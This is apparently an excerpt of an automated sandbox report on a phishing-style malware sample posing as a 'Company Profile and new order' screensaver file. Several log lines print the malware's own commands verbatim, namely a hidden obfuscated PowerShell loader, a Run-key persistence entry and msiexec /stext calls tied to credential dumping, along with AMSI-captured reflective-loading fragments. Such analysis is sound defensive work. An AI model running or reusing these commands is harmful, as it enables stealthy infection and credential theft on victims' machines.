            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg"
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"Jump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Company Profile and new order-202401127.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000002.00000002.2617447888.000000000A528000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Mellemtekstens $Merkantiliserings $Smutvejens239), (Timeliges @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aftrappendes230 = [AppDomain]::CurrentDomain.
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bldhjertede)), $Oprmning).DefineDynamicModule($Baneanlg, $false).DefineType($Bastardiserende, $Straffeprdikenernes, [System.MulticastD
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0518A4D0 pushfd ; ret 2_2_0518A4D9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_05180F97 pushad ; retf 0004h2_2_05180FA2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0518E9F9 push eax; mov dword ptr [esp], edx2_2_0518EA0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_051812D8 push esp; retf 0004h2_2_051812E1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07CC0FC4 push es; iretd 2_2_07CC0FC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09A12C90 push 8BD38B50h; iretd 2_2_09A12C96
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F61219 push esp; iretd 6_2_22F6121A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F52806 push ecx; ret 6_2_22F52819
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00451D34 push eax; ret 11_2_00451D41
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00444E71 push ecx; ret 11_2_00444E81
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00414060 push eax; ret 12_2_00414074
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00414060 push eax; ret 12_2_0041409C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00414039 push ecx; ret 12_2_00414049
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Company Profile and new order-202401127.scr.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LoadedJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LoadedJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047CB
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
